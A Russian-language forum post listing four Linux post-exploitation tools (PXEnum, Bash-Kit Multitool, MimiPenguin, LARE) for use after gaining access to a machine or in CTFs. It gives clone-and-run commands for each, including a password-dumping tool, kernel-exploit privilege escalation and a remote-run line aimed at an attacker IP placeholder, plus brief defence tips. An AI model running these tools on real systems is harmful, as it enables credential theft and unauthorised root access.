- Регистрация
- 8 Янв 2019
- Сообщения
- 527
- Реакции
- 71
- Баллы
- 118
Сегодня — минимум слов, максимум практики. Ниже представлены инструменты пост-эксплуатации для Linux, которые применяются после получения доступа к машине в периметре сети или на CTF.
Что такое пост-эксплуатация:
Фаза после выполнения кода на целевой машине. На этом этапе злоумышленник:
- Выполняет произвольные команды
- Изучает локальные данные
- Организует перманентный доступ
- Эскалирует привилегии
- Перехватывает будущие данные
Также анализируются:
- Конфигурации системы и веб-серверов
- Исходный код
- Доступы к БД
- Сетевые сегменты
ТОП инструментов пост-эксплуатации под Linux:
1. PXEnum — сбор всей инфы о системе
Скрипт, вытаскивающий максимум сведений о машине. Работает без root, запускается в обычном терминале.
Установка:
git clone https://github.com/shawnduong/PXEnum.git
cd PXEnum
chmod +x PXEnum.sh
bash PXEnum.sh
2. MIDA Multitool — SysEnum и RootHelper в одном флаконе
Собирает данные о системе и помогает с привилегиями.
Установка:
git clone https://github.com/NullArray/Bash-Kit-Multitool
cd Bash-Kit-Multitool
chmod +x bashkit.sh
./bashkit.sh
3. MimiPenguin — сброс паролей в Linux
Аналог mimikatz для Linux. Поддерживает Apache2, OpenSSH, FTP и другие сервисы.
Установка:
git clone https://github.com/huntergregal/mimipenguin
cd mimipenguin
chmod +x mimipenguin.sh
./mimipenguin.sh
4. LARE — получение root через уязвимости ядра
Скрипт для root-доступа через баги Linux Kernel 2.6–4.8. Часто используется на экзаменах OSCP.
Установка:
git clone https://github.com/EnigmaDimitri/LARE && cd LARE
chmod +x LARE.sh
./LARE.sh -a
Удалённый запуск:
./LARE.sh -l [IP атакующего]
Как защититься от пост-эксплуатации:
- Своевременные патчи
- Ограниченные права доступа
- Специализированные средства контроля системы
Материал предоставлен только в ознакомительных целях.

